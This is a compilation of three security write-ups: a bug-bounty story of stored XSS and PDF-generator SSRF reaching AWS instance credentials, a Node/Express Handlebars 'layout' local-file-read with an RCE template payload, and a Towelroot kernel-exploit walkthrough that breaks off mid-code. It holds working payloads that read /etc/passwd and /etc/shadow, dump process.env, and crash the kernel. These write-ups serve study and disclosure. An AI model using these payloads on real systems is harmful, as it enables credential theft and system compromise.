Story Behind Sweet SSRF.

Story Behind Sweet SSRF.

Original text by Rohit Soni

Persistence is the Key to Success.🔥

Image for post

Hey everyone! I hope you all are doing well!

Rohit soni is back with another write-up and this time it’s about critical SSRF which leads to AWS credentials disclosure. Let’s dive into it without wasting time.

Couple of months back when there was lockdown in whole world due to COVID-19 pandemic I was spending my most of time in hunting, learning and exploring new stuff (specifically about pentesting😜).

One day while scrolling linkedin feed I saw one guy’s post saying got hall of fame in website. The post caught my attention and as I was not hunting on any program I started hunting on that program.

Note: I am not allowed to disclose the target website. So, Let’s call it

I created an account on and started exploring every functionalities. After spending couple of hours hunting and exploring functionalities I saw my email address was reflected in the response in script tag as shown in below image.

Image for post
Look at that email address.

Ahh… Very first thing came into my mind was XSS. I changed my email address to“h4ck3d!!”)- But failed because it is not a valid email address. But In very next moment I intercepted the request using burp and changed my email address in intercepted request and forwarded it.

Boom….Got Stored XSS.

Image for post
XSS is Love❤ (Sorry for poor picture quality😅)
Image for post
Payload reflected without filtering/encoding/sanitizing special characters.

Root cause of this XSS was lack of input validation at server side. Website was validating email address at client side only that’s why it did not allowed me to directly input my payload in email field but as server was not filtering out or encoding special characters my payload stored and I got the pop-up.

Okay, That’s cool but where is the SSRF you promised !? 😐

Main Story begins from here.

Stored XSS is nice finding but hacker inside me was screaming “You can find critical, I want P1😜”. So, I kept hunting and came across the functionality that allows to export user inputted text in pdf file.

After seeing this functionality I remembered a write-up which was about ssrf by abusing pdf generator functionality. I have not read the write-up but I remembered the title. I quickly googled the title and found the right write-up, I read and applied the same.

Identification Part :

I was able to figure out that Custom cover page content field was vulnerable.

Image for post

What I did was, I supplied <center><u>hello there</u></center> HTML tags as an input in Custom cover page content field and exported as pdf. and I got something very interesting.

Image for post

As you can see in above screenshot, it accepted HTML tags and generated the pdf according to supplied HTML tags. Interesting..!!

Next step is to check if its vulnerable for SSRF. I confirmed that generate pdf file functionality is vulnerable for SSRF using <iframe> tag and burp collaborator client. Payload I used was:

<iframe src=“”></iframe>

Image for post
Woah, SSRF Identified. {^_^}

HTTP request from target server is logged into my burp collaborator client window. Woah, SSRF Identified.

Root Cause: <iframe> tag used to embed/load website into another website. While generating pdf file, the target server requested my burp collaborator client to load it into <iframe> tag. As a result I got request logged into collaborator client.

Still, This SSRF does not has much impact. Let’s exploit and see what we can achieve by exploiting this SSRF.

Exploitation Part

To exploit this SSRF I used following payload.

<iframe src=“http://localhost”></iframe>

But unfortunately it doesn’t worked and showed me blank pdf file.

Image for post
Failed. -_-

After that I though to load files stored at server side. For example, /etc/passwd file. To do that I built following payload.

<iframe src=“file://etc/passwd”></iframe>

But again bad luck. Got same blank pdf file.

I used different different payloads to exploit the SSRF but I failed. Few of them are as follows. (I failed doesn’t mean you will also. Try your luck😉)

<iframe src=“file://etc/shadow”></iframe>

<iframe src=“http:localhost”></iframe>

<iframe src=“//”></iframe>

<iframe src=“”></iframe>

Any of the above payload was not working for me. Then, I thought to check the IP address which got on burp collaborator client on shodan and I came to know that the website is running on Amazon EC2 machine.

Image for post
Website is Hosted on Amazon EC2 Instance.

After considerable amount of fail attempts. I took a break and thought to ask to ritik sahni. He is my good friend and 15yo talented hacker. I called him and told him whole scenario.

He took few minutes and replied, Try to load following URL in iframe source:

As soon as I did it, I was like, Woah!! I got their internal directories and files listed out in iframe.

Image for post
Got Internal Directories and Files.

You must be wondering from where IP address came.!

The IP address is a link-local address and is valid only from the instance. In simple terms, We can say this IP is localhost for your EC2 Instance.

and by using we can retrieve instance metadata.

Then, Ritik told me to check iam/ directory. I was able to get AWS security credentials from iam directory. Have a look at below attached PoC.

Image for post

Final Payload:

<iframe src=“” width=“100%”></iframe>

Image for post

It took me around 4 hours to identify and exploit SSRF. Special thanks to my friend Ritik Sahni (

Hope you enjoyed my story. If you have any questions or suggestions reach me through instagram, twitter or linkedin.

Happy Hunting. 🙂

Instagram: @street_of_hacker

Twitter: @streetofhacker

LinkedIn: Rohit Soni

Special Thanks to Ritik Sahni:

And also Thanks to for amazing swags.😁

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

Original text by CAPTAINFREAK


If you are using ExpressJs with Handlebars as templating engine invoked via hbs view engine, for Server Side Rendering, you are likely vulnerable to Local File Read (LFR) and potential Remote Code Execution (RCE).


  1. If the target is responding with X-Powered-By: Express and there is HTML in responses, it’s highly likely that NodeJs with server-side templating is being used.
  2. Add layout in your wordlist of parameter discovery/fuzzing for GET query or POST body.
  3. If the arbitrary value of layout parameter added is resulting in 500 Internal Server Error with ENOENT: no such file or directory in body, You have hit the LFR.


About more than a week back, I stumbled upon a critical Local File Read (LFR) security issue which had the potential to give Remote Code Execution in a fairly simple ~10 lines of NodeJS/ExpressJs code which looked like the following:

var express = require(‘express’);
var router = express.Router();

router.get(‘/’, function(req, res, next) {
});‘/’, function(req, res, next) {
var profile = req.body.profile
res.render(‘index’, profile)

module.exports = router;

The whole source can be found here.

If you are even a little bit familiar with NodeJs Ecosystem and have written at least your first Hello World endpoint in ExpressJs, you will certify that this is clearly straightforward and innocent code.

So after getting surprised and disillusioned by the security bug, I remembered that It’s indeed called Dependency Hell. To be honest, I should not have been that surprised.

The betrayal by in-built modules, dependencies, and packages have been the reason to introduce numerous security bugs. This is a re-occurring theme in software security anyway.

To check out if this is a known issue or not, I created a CTF challenge and shared it with many of my talented friends belonging to multiple community forums of Web Security, Node, Backend Engineering, CTFs, and BugBounty.

Node/Express.js Web Security Challenge:

Very short code:

Can you find the flag: 𝗰𝗳𝗿𝗲𝗮𝗸{.*}#nodejs #javascript #JS #ctf #bugbounty— CaptainFreak (@0xCaptainFreak) January 15, 2021

Turns out this was not known, Even after giving the whole source code of the challenge, only 4 people were able to solve it (all CTFers 🥳):

  1. @JiriPospisil
  2. @CurseRed
  3. @zevtnax
  4. @po6ix

Congrats to all the solvers 🎊 and thanks a lot to everybody who tried out the challenge.

For the people who still wanna try out, I plan to keep the Profiler Challenge up for one more week. Stop Reading and check it out now!

Challenge Solution

1curl -X ‘POST’ -H ‘Content-Type: application/json’ —data-binary $'{\»profile\»:{«layout\»: \»./../routes/index.js\»}}’ ‘’

HTTP request:

Content-Length: 48
Content-Type: application/json

«profile»: {
«layout»: «./../routes/index.js»

HTTP Response (content of routes/index.js):

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 463

var express = require(‘express’);
var router = express.Router();

const flag = «cfreak{It’s called Dependency Hell for a reason! (}»

/* GET home page. */
router.get(‘/’, function(req, res, next) {
});‘/’, function(req, res, next) {
var profile = req.body.profile
res.render(‘index’, profile)

module.exports = router;


1«cfreak{It’s called Dependency Hell for a reason! (}»

That’s It! What the heck, right? You might be thinking, what even is this layout parameter? and where is it even coming from. Soo out of context!

If you like Code Review, why don’t you find out? It will be a good code review exercise.

Secret layout parameter

To find out from where it is coming, we can track the flow of our input from Source to Sink till we find out the reason why LFR is happening.

Source (Line 3):

4‘/’, function(req, res, next) {
var profile = req.body.profile
res.render(‘index’, profile)

Let’s follow the path this profile object argument takes.

res.render = function render(view, options, callback) {
var app =;
var opts = options || {};

// render
app.render(view, opts, done);

“index” argument became view & our profile argument became the options parameter which became opts and got flown into app.render

app.render = function render(name, options, callback) {
var opts = options;
var renderOptions = {};
var view;

merge(renderOptions, opts);

var View = this.get(‘view’);

view = new View(name, {
defaultEngine: this.get(‘view engine’),
root: this.get(‘views’),
engines: engines

// render
tryRender(view, renderOptions, done);

function tryRender(view, options, callback) {
try {
view.render(options, callback);
} catch (err) {
View.prototype.render = function render(options, callback) {
debug(‘render «%s»‘, this.path);
this.engine(this.path, options, callback);

In View class, this.engine becomes an instance of hbs in our case and this.path = rootViewDir + viewFilename. The options argument is our profile.

I will take the liberty here and modify the code a bit to make it linear and easy to understand, but you can check out the original version on Github.

function middleware(filename, options, cb) {
// The Culprit —
var layout = options.layout;

var view_dirs = options.settings.views;
var layout_filename = [].concat(view_dirs).map(function (view_dir){
// Some code to create full paths
var view_path = path.join(view_dir, layout || ‘layout’);

// This actually restricts reading/executing files without extensions.
if (!path.extname(view_path)) {
view_path += extension;
return view_path;


// in-memory caching Code
function tryReadFileAndCache(templates) {
var template = templates.shift();
fs.readFile(template, ‘utf8’, function(err, str) {
cacheAndCompile(template, str);

function cacheAndCompile(filename, str) {
// Here we get compiled HTML from handlebars
var layout_template = handlebars.compile(str);
// Some further logic

We can stop analysing here, as you can see on Line 22 we effectively read from the Root Views Dir + layout and pass it to handlebars.compile which gives us the HTML after compiling the given file which we completely control (Except the extension cause it’s added explicitly from the config to the path if not provided already. Line. 12).

Hence the LFR, we can read any files with extensions.


As the templating is involved, we do have a strong potential for RCE. It has the following pre-requisites though:

  1. Through the above LFR read ./../package.json.
  2. See the version of hbs being used, it should be <= 4.0.3. Because after this version, the hbs team started using Handlebars.js of version >= 4.0.14Commit Link.
  3. In Handlebars below this version, it was possible to create RCE payloads. There is an awesome writeup on this by @Zombiehelp54 with which they got RCE on Shopify.
  4. And you should have a functionality of file upload on the same box with a known location, which is quite an ask considering everybody uses blob storage these days, but we never know 🤷‍♂️

With above fulfilled, you can write a handlebars template payload like below to get RCE:

<!— (by [@avlidienbrunn]( —>

{{#with «s» as |string|}}
{{#with «e»}}
{{#with split as |conslist|}}
{{this.push (lookup string.sub «constructor»)}}
{{#with string.split as |codelist|}}
{{this.push «return JSON.stringify(process.env);»}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}

Fix 🤕

Easy fix would be to stop using the code anti-pattern shown in the above example like below:

1❌ res.render(‘index’, profile)


1✅ res.render(‘index’, { profile })

which I think many devs use already so that they can be more descriptive in templates with the usage of just “{{name}}” vs “{{}}”.

But think for a second again, is the above code safe? Yea sure, we don’t have a way to provide layout in the options argument to res.render anymore. But is there any way to still introduce the culprit layout parameter?

Prototype Pollution!

It would be ignorant if we don’t mention proto pollution in a Js/NodeJs Web Security writeup 🙃 !

Readers who are unaware of proto pollution, please watch this awesome talk from Olivier Arteau at NorthSec18.

As you can see, even the most common pattern (res.render('template', { profile })) of passing objects to render function is not safe, If the application has prototype pollution at any place with which an attacker can add layout to prototype chain, the output of every call to res.render will be overwritten with LFR/RCE. So we have DoS-ish LFR/RCE! With presence of exploitable proto pollution, this becomes quite a good gadget plus becomes unfixable unless we fix proto pollution.

Solid Fix

  1. First fix proto pollution if you are vulnerable to it.
  2. and you can remove the layout key from the object or do whatever to stop it from reaching that vulnerable Sink.

Let me know what you think should be the proper fix?

Above I have described my observations on a potentially critical vulnerability in the Setup of NodeJS + Express + HBS.

As this setup is pretty common, I wanted this writeup to be out there. The handlebars engine particularly is very popular due to it’s support of HTML symantics. Everytime I work on a side-project, I quickly setup the boilerplate code with quick one liner of express-generator cli express --view hbs and this creates the exact same stack the above issue is talking about. Don’t know how many time I might have used that code line myself. I plan to do the same kind of review for other view engines that express supports (ejs, hjs, jade, pug, twig, vash).

Anyways, thanks for Reading! If something is erroneous, please let me know, would love to have a constructive discussion.

It’s called Dependency Hell for a reason!


Exploiting CVE-2014-3153 (Towelroot)

Exploiting CVE-2014-3153 (Towelroot)

Original text by Elon Gliksberg

Understanding The Kernel

For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,
and that I did not truly grasp how some of it works, a “black-box”.

I’ve always been more than familiar with kernel and OS concepts,
but there’s a big gap from comprehending them as a user versus a kernel hacker.
I wanted to see code, not words.

In order to tackle that, I decided to take on a small kernel exploit challenge, and in parallel read Linux Kernel Development. Initially, the thought of reading the kernel’s code seemed a bit spooky, “I wouldn’t understand a thing”. Little by little, it wasn’t as intimidating, and honestly, it turned out to be quite easier than I expected.

Now, I feel tenfolds more comfortable to simply look something up in the source in order to understand how it works, rather than searching man pages endlessly or consulting other people.

Kernel Exploitation

The book was really nice and all, but I wanted to get my hands dirty.
I searched for a disclosed vulnerability within the Linux kernel,
my plan being that I’d read its flat description and develop my own exploit to it.
A friend recommended CVE-2014-3153, also known as Towelroot, and I just went for it.
Back in the days, it was very commonly used in order to root Android devices.

Fast Userspace Mutex

The vulnerability is based around a mechanism called Futex within the kernel.
Futex being a wordplay on Fast userspace Mutex.

The Linux kernel provides futexes as a building block for implementing userspace locking.
A Futex is identified by a piece of memory which can be shared between processes or threads. In its bare form, a Futex is a counter that can be incremented and decremented atomically and processes can wait for its value to become positive.

Futex operation occurs entirely in userspace for the noncontended case.
The kernel is involved only to arbitrate the contended case.
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.

The futex() system call provides a method for waiting until a certain condition becomes true. It is typically used as a blocking construct in the context of shared-memory synchronization. When using futexes, the majority of the synchronization operations are performed in user space. A user- space program employs the futex() system call only when it is likely that the program has to block for a longer time until the condition becomes true. Other futex() operations can be used to wake any processes or threads waiting for a particular condition.

I will cover only the terms and concepts related to the exploitation.
For a more profound insight about futexes, please reference man futex(2) and man futex(7).
I strongly suggest messing around with the examples in order to assess your understanding.

The futex() syscall isn’t typically used by “everyday” programs, but rather by system libraries such as pthreads that wrap its usage. That’s why the syscall doesn’t have a glibc wrapper like most syscalls do. In order to call it, one has to use syscall(SYS_futex, ...).

Due to the blocking nature of futex() and it being a way to synchronize between different tasks,
you’d notice how there’s a lot of dealing with threads within the exploit which can get slightly confusing unless approached slowly.

There are two core concepts to understand about futexes in general which we’d talk a lot about.

The first is something’s called a waiters list, also known as the wait queue.
This term refers to the blocking threads that are currently waiting for a lock to be released.
It is held in kernelspace and programs can issue syscalls to carry out operations on it. For instance, attempting to lock a contended lock would result in an insertion of a waiter, releasing a lock would pop a waiter from the list and reschedule its task.

The second is that there are two kinds of futexes: PI & non-PI.
PI stands for Priority Inheritance.

Priority inheritance is a mechanism for dealing with the priority-inversion problem. With this mechanism, when a high- priority task becomes blocked by a lock held by a low-priority task, the priority of the low-priority task is temporarily raised to that of the high-priority task, so that it is not preempted by any intermediate level tasks, and can thus make progress toward releasing the lock.

This introduces the ability to prioritize waiters among the futex’s waiters list.
A higher-priority task is guaranteed to get the lock faster than a lower-priority task.
Unlike non-PI operations, for instance.

This operation wakes at most val of the waiters that are waiting (e.g., inside FUTEX_WAIT) on the futex word at the address uaddr. Most commonly, val is specified as either 1 (wake up a single waiter) or INT_MAX (wake up all waiters). No guarantee is provided about which waiters are awoken (e.g., a waiter with a higher scheduling priority is not guaranteed to be awoken in preference to a waiter with a lower priority).

Both non-PI and PI futex types are used within the exploit.
The way PI futexes are implemented is using what’s called in the kernel a plist, a priority-sorted list.
If you don’t know what it is, you could take a look here, though this image sums it up perfectly.

Priority List Image

All images are copied from Appdome.

Bug & Vulnerability

Here’s the CVE description.

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

Let’s break it down.
First, we need to understand what’s a requeue operation in the context of futexes.
A waiter, blocking thread, that is contending on a lock, can be “requeued” by a running thread to be told to wait on a different lock instead of the one that it currently waits on.

A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.
A waiter on a PI-futex cannot be requeued.
The bug itself is that there are no validations whatsoever on requeuing from a futex to itself.

This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.

Requeues waiters that are blocked via FUTEX_WAIT_REQUEUE_PI on uaddr from a non-PI source futex (uaddr) to a PI target futex (uaddr2).

Take a look at the bug fix commit, both the description and the code changes.

Though, what actually happens when you requeue a waiter to itself? Good question.

Before actually diving into the exploit, I decided to provide a rough overview of how it works for context further on. Eventually, what this bug gives us is a dangling waiter within the futex’s waiters list. The way the exploit does that is as follows:

1.FUTEX_LOCK_PILock a PI futex.
2.FUTEX_WAIT_REQUEUE_PIWait on a non-PI futex, with the intention of being requeued to the PI futex.
3.FUTEX_CMP_REQUEUE_PIRequeue the non-PI futex waiter onto the PI futex.
4.Userspace OverwriteSet the PI futex’s value to 0 so that the kernel treats it as if the lock is available.
5.FUTEX_CMP_REQUEUE_PIRequeue the PI futex waiter to itself.

And now we’ll understand why this results in a dangling waiter.

There are a lot of different data types within the Futex’s implementation code,
in order to cope with that I made somewhat of a summary of them to help me keep track of what’s going on. Feel free to use it as needed.

Step 1

We start off by locking the PI-futex. We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately. That waiter is destined to be our dangling waiter later on in the exploit.

Step 2

In order to requeue a waiter from a non-PI –> PI futex, we first have to invoke FUTEX_WAIT_REQUEUE_PI on the non-PI futex, which in turn translates to the futex_wait_requeue_pi() function.
What this function does is take a non-PI futex and wait (FUTEX_WAIT) on it, and a PI-futex that it can potentially be requeued to with a FUTEX_CMP_REQUEUE_PI command later on.

static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
				 u32 val, ktime_t *abs_time, u32 bitset,
				 u32 __user *uaddr2)
	struct hrtimer_sleeper timeout, *to = NULL;
	struct rt_mutex_waiter rt_waiter; // <-- Important
	struct rt_mutex *pi_mutex = NULL;
	struct futex_hash_bucket *hb;
	union futex_key key2 = FUTEX_KEY_INIT;
	struct futex_q q = futex_q_init;
	int res, ret;

The function defines various local variables, the most important of which is the rt_waiter variable.
Unsurprisingly, this variable is our waiter.

struct rt_mutex_waiter {
    struct plist_node    list_entry;
    struct plist_node    pi_list_entry;
    struct task_struct    *task;
    struct rt_mutex        *lock;

It contains the lock that it waits on, it holds references to other waiters in the waiters list through the list_entry plist node, and on top of that it also has a pointer to the task that it currently blocks.

Needless to say that the locals are placed on the kernel stack, but also worth mentioning that because it’ll be crucial to understand in the near future.

Later on, it initializes the futex queue entry and enqueues it.

	q.bitset = bitset;
	q.rt_waiter = &rt_waiter;
	q.requeue_pi_key = &key2;
	/* Queue the futex_q, drop the hb lock, wait for wakeup. */
	futex_wait_queue_me(hb, &q, to);

Note how it sets the requeue_pi_key to the futex key of the target futex.
This is part of what allows us to self-requeue. We’ll see this in the final step.

At this point in the code, the function simply blocks and does not continue unless:

  1. A wakeup occurs.
  2. The process is killed.

Step 3

Next up, futex_requeue() is called by the FUTEX_CMP_REQUEUE_PI operation in another thread in order to do the heavy lifting of actually requeuing the waiter. This is the vulnerable and most important function in the exploit. The function is fairly long and therefore I’m not going to review all of its logic, and rather only address the relevant parts.
I do encourage you to brief over it and try to get a hold of what it does.

static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
             u32 __user *uaddr2, int nr_wake, int nr_requeue,
             u32 *cmpval, int requeue_pi)
    if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
        ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                &key2, &pi_state, nr_requeue);
	 * Lock is already acquired due to our call to FUTEX_LOCK_PI in step 1.
	 * Therefore the acquisition fails and 0 is returned.
	 * We will revisit futex_proxy_trylock_atomic below.
    head1 = &hb1->chain;
    plist_for_each_entry_safe(this, next, head1, list) {
        if (requeue_pi) {
            this->pi_state = pi_state;
            ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
                            this->task, 1);
	 * this->rt_waiter points to the local variable rt_waiter
	 * in the futex_wait_requeue_pi from step 2.
	 * It is now added as a waiter on the new lock.

Let’s quickly glance at the code that requeues the waiter at rt_mutex_start_proxy_lock().

int rt_mutex_start_proxy_lock(struct rt_mutex *lock,
			      struct rt_mutex_waiter *waiter,
			      struct task_struct *task, int detect_deadlock)
	int ret;


	// Attempt to take the lock. Fails because lock is taken.
	if (try_to_take_rt_mutex(lock, task, NULL)) {
		return 1;

	ret = task_blocks_on_rt_mutex(lock, waiter, task, detect_deadlock);

And inside task_blocks_on_rt_mutex().

static int task_blocks_on_rt_mutex(struct rt_mutex *lock,
				   struct rt_mutex_waiter *waiter,
				   struct task_struct *task,
				   int detect_deadlock)
	struct task_struct *owner = rt_mutex_owner(lock);
	struct rt_mutex_waiter *top_waiter = waiter;
	unsigned long flags;
	int chain_walk = 0, res;
	// Set the waiter's task and rt_mutex members.
	waiter->task = task;
	waiter->lock = lock;
	// Initialize the waiter's list entries.
	plist_node_init(&waiter->list_entry, task->prio);
	plist_node_init(&waiter->pi_list_entry, task->prio);

	/* Get the top priority waiter on the lock */
	if (rt_mutex_has_waiters(lock))
		top_waiter = rt_mutex_top_waiter(lock);

	// Add the waiter to the waiters list.
	plist_add(&waiter->list_entry, &lock->wait_list);

Now, rt_waiter of futex_wait_requeue_pi() is a node in the waiters list of our PI futex.

Step 4

Here we’ll set the userspace value of the futex, also known as the futex-word, to 0.
This is vital so that when the self-requeuing occurs, the call to futex_proxy_trylock_atomic() will succeed and wake the top waiter of the source futex, which is in fact the same as the destination futex. The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.

It might seem confusing at first but it’ll clear up in the next step.

Step 5

On this step, we’ll requeue the PI futex waiter to itself and invoke futex_requeue() once again.

if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
		 * Attempt to acquire uaddr2 and wake the top waiter. If we
		 * intend to requeue waiters, force setting the FUTEX_WAITERS
		 * bit.  We force this here where we are able to easily handle
		 * faults rather in the requeue loop below.
		ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
						 &key2, &pi_state, nr_requeue);

Let’s take a look at futex_proxy_trylock_atomic() this time.

 * Return:
 *  0 - failed to acquire the lock atomically;
 *  1 - acquired the lock;
 * <0 - error
static int futex_proxy_trylock_atomic(u32 __user *pifutex,
				 struct futex_hash_bucket *hb1,
				 struct futex_hash_bucket *hb2,
				 union futex_key *key1, union futex_key *key2,
				 struct futex_pi_state **ps, int set_waiters)
	struct futex_q *top_waiter = NULL;
	u32 curval;
	int ret;
	top_waiter = futex_top_waiter(hb1, key1);

	/* There are no waiters, nothing for us to do. */
	if (!top_waiter)
		return 0;

	/* Ensure we requeue to the expected futex. */
	if (!match_futex(top_waiter->requeue_pi_key, key2))
		return -EINVAL;

	 * Try to take the lock for top_waiter.  Set the FUTEX_WAITERS bit in
	 * the contended case or if set_waiters is 1.  The pi_state is returned
	 * in ps in contended cases.
	ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
	if (ret == 1)
		requeue_pi_wake_futex(top_waiter, key2, hb2);

	return ret;

Pay attention to how it ensures that the requeue_pi_key of the top_waiter is equal to the requeue’s target futex’s key. This is why we need to self-requeue, and why it wouldn’t be sufficient to just set the value of a different futex in userspace to 0 and requeue to it.

So the requirements for triggering the bug are:

  1. The target futex from the futex_wait_requeue_pi() remains.
  2. There’s a waiter that is actively contending on the source futex.

The only scenario that meets both these terms is a self-requeue.

Other than that, basically all it does is call futex_lock_pi_atomic() and if the lock was acquired,
wake up the top waiter of the source futex.

static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
				union futex_key *key,
				struct futex_pi_state **ps,
				struct task_struct *task, int set_waiters)
	int lock_taken, ret, force_take = 0;
	u32 uval, newval, curval, vpid = task_pid_vnr(task);

	ret = lock_taken = 0;

	 * To avoid races, we attempt to take the lock here again
	 * (by doing a 0 -> TID atomic cmpxchg), while holding all
	 * the locks. It will most likely not succeed.
	newval = vpid;
	if (set_waiters)
		newval |= FUTEX_WAITERS;

	if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, 0, newval)))
		return -EFAULT;
	 * Surprise - we got the lock. Just return to userspace:
	if (unlikely(!curval))
		return 1;

The function attempts to atomically compare-and-exchange the futex-word. It compares it to 0 which is the value that signals the lock is free and exchanges it with the task’s PID.

This operation is unlikely to succeed because the user could’ve done it in userspace and avoid the expensive syscall, therefore the assumption is that the user wasn’t able to retrieve the lock in userspace and needed the kernel’s “help”. That’s why it would be a “surprise” in case it was able to get the lock.

Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter, which is the waiter that was added to the waiters list on the first requeue (step 3).
Because we overwrote the value in userspace (step 4), the function succeeds and wakes the waiter.

ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
	if (ret == 1)
		requeue_pi_wake_futex(top_waiter, key2, hb2);

When futex_requeue() wakes up the waiter, it sets the rt_waiter to NULL in order to signal futex_wait_requeue_pi() that the atomic lock acquisition was successful.

static inline
void requeue_pi_wake_futex(struct futex_q *q, union futex_key *key,
			   struct futex_hash_bucket *hb)
	q->key = *key;


	q->rt_waiter = NULL; // Right here.

	q->lock_ptr = &hb->lock;

	// Start scheduling the task again.
	wake_up_state(q->task, TASK_NORMAL);

Its usage is seen here within futex_wait_requeue_pi().

/* Check if the requeue code acquired the second futex for us. */
	if (!q.rt_waiter) {
		 * Got the lock. We might not be the anticipated owner if we
		 * did a lock-steal - fix up the PI-state in that case.
	} else {
		 * We have been woken up by futex_unlock_pi(), a timeout, or a
		 * signal.  futex_unlock_pi() will not destroy the lock_ptr nor
		 * the pi_state.
		 // Removes the waiter from the wait_list.
		ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
		/* Unqueue and drop the lock. */

And as we can see, rt_mutex_finish_proxy_lock() is not being called since rt_waiter is NULL, and therefore the waiter is kept as-is within the waiters list.


We start off by locking a PI-futex. Then we simply requeue a thread to it which creates a waiter entry on the futex’s waiters list. Afterwards, we overwrite the futex-word with 0. Once we’ll requeue the waiting thread onto itself, the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.

Recap Image

This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running. Now, the waiter entry points to garbage kernel stack memory. The original rt_waiter is long gone and was destroyed by other function calls on the stack.

Bugged Waiter Image

Our waiter, a node in the waiters list, is now completely corrupted.

Building The Kernel

I won’t go too in depth as to how I built the kernel, since there are a milion of tutorials out there on how to do that. I’d merely state that I’ve been using an 3.11.4-i386 kernel for this exploit that I compiled on a Xenial (Ubuntu 16.04) Docker container.

The only actual hassle was getting my hands on the right gcc version for the according kernel version that I worked on. I compared the GCC releases with the Linux kernel version history and tried various versions that seemed to fit by release date. Ultimately gcc-5 was what did the job for me.

It would be virtually impossible to do all of that without building your own kernel.
The ability to debug the code and add your own logs within the code is indescribable.

For actually running the kernel, I’ve used QEMU as my emulator.


Now’s the time for the actual fun.

Eventually, our goal would be to escalate to root privileges.
The way we’d do that is by achieving arbitrary read & write within the kernel’s memory, and then overwrite our process’ cred struct which dictates the security context of a task.

struct cred {
	atomic_t	usage;
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */

The most fundamental members of cred are presumably the real uid and gid, but it also stores other properties such as the task’s capabilities and many other.

Although how would we go about it by solely having a wild reference to that waiter?
Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities. Same applies here. We’d need to find a way to write to that dangling waiter, and then perform certain operations on it so that the kernel would do as we please.

Kernel Crash

But let’s start small. For now we’ll just attempt to crash the kernel.

I wrote a program that implements the steps that we listed above.
Let’s analyze it before going into the actual exploitation. Here’s the code.

#define CRASH_SEC 3

int main()
    pid_t pid;
    uint32_t *futexes;
    uint32_t *non_pi_futex, *pi_futex;

    assert((futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)) > 0);

    non_pi_futex = &futexes[0];
    pi_futex = &futexes[1];


    assert((pid = fork()) != -1);
    if (!pid)
        fwait_requeue(non_pi_futex, pi_futex, 0);
        puts("Child continues.");

    printf("Kernel will crash in %u seconds...\n", CRASH_SEC);

    frequeue(non_pi_futex, pi_futex, 1, 0);
    *pi_futex = 0;
    frequeue(pi_futex, pi_futex, 1, 0);


The flockfwait_requeue, and the frequeue functions are implemented in a small futex wrappers file that I’ve created for simplification and ease on the eyes.

futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)

We start off by allocating sizeof(uint32_t) * 2 of R/W memory which is our two futexes.
Mind the MAP_SHARED flag that is being passed to mmap call in order to signal that the memory needs to be shared among the main process and the process that is spawned from the fork() call.

Side-comment: In the actual exploit you’d see that I’m using pthreads rather than fork() which makes the code much clearer, and there’s no need to map a shared address space since all threads point to the same virtual address space.

  1. Locking the pi_futex. flock(pi_futex)
  2. Spawn a child process and call FUTEX_WAIT_REQUEUE_PI from non_pi_futex to pi_futex. assert((pid = fork()) != -1); if (!pid) { fwait_requeue(non_pi_futex, pi_futex, 0); puts("Child continues."); exit(EXIT_SUCCESS); }
  3. We only sleep to assure that the fwait_requeue of the child process had already been issued. Afterwards, we requeue the waiter to the pi_futex. sleep(CRASH_SEC); frequeue(non_pi_futex, pi_futex, 1, 0);
  4. Overwrite the userspace value of the pi_futex to 0. *pi_futex = 0;
  5. Self-requeue. frequeue(pi_futex, pi_futex, 1, 0);

Now let’s see this in action.

If you paid attention to the call trace, you would spot that the kernel crashes once the process itself terminates (do_exit). What happens is that the kernel attempts to cleanup the process’ resources (mm_release), specifically the PI state list (exit_pi_state_list), and when it attempts to do so, it unlocks all the futexes that the process holds. During the process of releasing them, the kernel tries to unlock our corrupted waiter as well which causes a crash.

To be more accurate, it occurs here.

static inline struct rt_mutex_waiter *
